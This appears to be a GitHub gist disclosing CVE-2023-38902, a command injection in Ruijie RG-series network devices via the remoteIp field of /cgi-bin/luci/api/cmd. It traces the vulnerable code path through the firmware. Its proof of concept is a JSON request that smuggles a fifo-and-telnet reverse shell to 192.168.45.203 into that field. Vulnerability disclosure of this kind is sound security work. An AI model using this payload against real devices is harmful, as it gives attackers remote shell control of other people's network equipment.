Skip to content

Instantly share code, notes, and snippets.

@ZIKH26

ZIKH26/CVE_ruijie_report.md Secret

Last active September 1, 2023 06:25
Show Gist options
  • Star 2 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save ZIKH26/18693c67ee7d2f8d2c60231b19194c37 to your computer and use it in GitHub Desktop.
Save ZIKH26/18693c67ee7d2f8d2c60231b19194c37 to your computer and use it in GitHub Desktop.
Download ZIP
CVE ruijie report
Raw
CVE_ruijie_report.md

CVE-ID

CVE-2023-38902

Information

Vendor of the products: Ruijie Networks

Vendor's website: https://www.ruijienetworks.com/

Reported by: Wang Jincheng(wjcwinmt@outlook.com) ,He Nan(2777256035@qq.com)

Affected products: RG-EW Series Routers and Repeaters, RG-NBS and RG-S1930 Series Switches, RG-EG Series business VPN Routers, RG-EAP and RG-RAP Series Wireless APs, RG-NBC Series Wireless Controllers

Affected firmware version: EW_3.0(1)B11P219, SWITCH_3.0(1)B11P219, EG_3.0(1)B11P219, AP_3.0(1)B11P219, AC_3.0(1)B11P219

Firmware download address: ReyeeOS219

Overview

A command injection vulnerability in RG-EW series routers and repeaters v.EW_3.0(1)B11P219, RG-NBS and RG-S1930 series switches v.SWITCH_3.0(1)B11P219, RG-EG series business VPN routers v.EG_3.0(1)B11P219, RG-EAP and RG-RAP series wireless access points v.AP_3.0(1)B11P219, and RG-NBC series wireless controllers v.AC_3.0(1)B11P219 allows an authorized attacker to execute arbitrary commands on remote devices by sending a POST request to /cgi-bin/luci/api/cmd via the remoteIp field.

Vulnerability details

Analyzing the /usr/lib/lua/luci/modules/cmd.lua file reveals that operation types such as devConfig or devSta and operators such as get or set can be arbitrarily combined into different method fields. For instance, when selecting the devConfig.get method, it triggers the doParams(params) function. The params here is the JSON data sent by the POST request. Subsequently, during the invocation of the fetch function, it ultimately triggers the uf_client_call function from /usr/lib/libunifyframe.so. Following this, the data will be transmitted via socket to /usr/sbin/unifyframe-sgi.elf. image

In the /usr/lib/libunifyframe.so file, it is documented that the value of remoteIp is parsed from a1[5], where a1 represents the base address of the JSON data object. Moreover, a1 here is of type DWORD* (four bytes here), making a1[5] equivalent to *(a1+20), representing the remoteIp field.

image

Within the /usr/sbin/unifyframe-sgi.elf file, there exists a command injection vulnerability. The first formatting character %s in the snprintf function corresponds to *(a1+20), which represents the value of the params.remoteIp field in the POST request. This value is user-controllable, ultimately leading to the execution of arbitrary commands when the ufm_popen function is invoked.

image

Poc

Send the following POST request to /cgi-bin/luci/api/cmd.

{
    "method": "devConfig.get",
    "params": {
        "module": "123",
        "remoteIp": "$(mkfifo /tmp/test;telnet 192.168.45.203 6666 0</tmp/test|/bin/sh > /tmp/test)",
        "data": {
            "kkk": "abc"
        }
    }
}

Attack Demonstration

image image

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment